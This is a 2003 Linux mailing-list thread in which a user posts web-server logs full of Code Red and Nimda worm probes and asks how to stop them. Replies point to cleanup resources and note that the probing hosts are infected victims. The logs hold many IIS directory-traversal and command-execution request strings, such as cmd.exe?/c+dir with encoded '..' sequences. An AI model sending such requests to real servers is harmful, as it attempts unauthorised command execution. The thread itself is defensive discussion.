On Thursday 13 March 2003 01:57 pm, Jack Coates wrote: > http://www.monkeynoodle.org/lrp/deworming.html > > On Sun, 2003-03-09 at 05:01, Gary Hodder wrote: > > Hi all, > > any way to stop getting over run with this crud. > > The start of each line has been removed to protect the guilty. > > > > Thanks > > Gary. > > > > xxx.xxx.com [ip-of-host] - - [09/Mar/2003:15:10:58 +1100] "GET > > /scripts/root.exe?/c+dir HTTP/1.0" 404 300 > > 1100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 298 > > 1100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 > > v1100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 > > 1100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 > > 322 > > 1100]"GET/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/ > >c+dir HTTP/1.0" 404 339 > > 1100]"GET/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/ > >c+dir HTTP/1.0" 404 339 > > 1100]"GET/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1 > >c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 355 > > 1100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" > > 404 321 1100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir > > HTTP/1.0" 404 321 1100] "GET > > /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 1100] > > "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 > > 1100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" > > 400 305 > > 1100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 > > 305 1100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir > > HTTP/1.0" 404 322 > > 1100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 > > 322 1100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 300 > > 1100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 298 > > 1100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 > > 1100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 > > 1100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 > > 322 > > 1100]"GET/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/ > >c+dir HTTP/1.0" 404 339 > > 1100]"GET/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/ > >c+dir HTTP/1.0" 404 339 > > 1100]"GET/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1 > >c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 355 > > 1100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" > > 404 321 1100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir > > HTTP/1.0" 404 321 1100] "GET > > /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 1100] > > "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 > > 1100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" > > 400 305 > > 1100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 > > 305 1100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir > > HTTP/1.0" 404 322 > > 1100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 > > 322 1100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 300 > > 1100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 298 > > > > > > > > ______________________________________________________________________ > > > > Want to buy your Pack or Services from MandrakeSoft? > > Go to http://www.mandrakestore.com
Ummm, actually you are not protecting the guilty, but rather innocent victims of code red, nimda and gross negligence in not updating their systems. Pierre Fortin has some dandy answers, concerned with automnated email to sysadmins followed by action to keep them from bothering you or others. I think you will find them at his site. http://pfortin.com/Linux/ Civileme
Want to buy your Pack or Services from MandrakeSoft? Go to http://www.mandrakestore.com
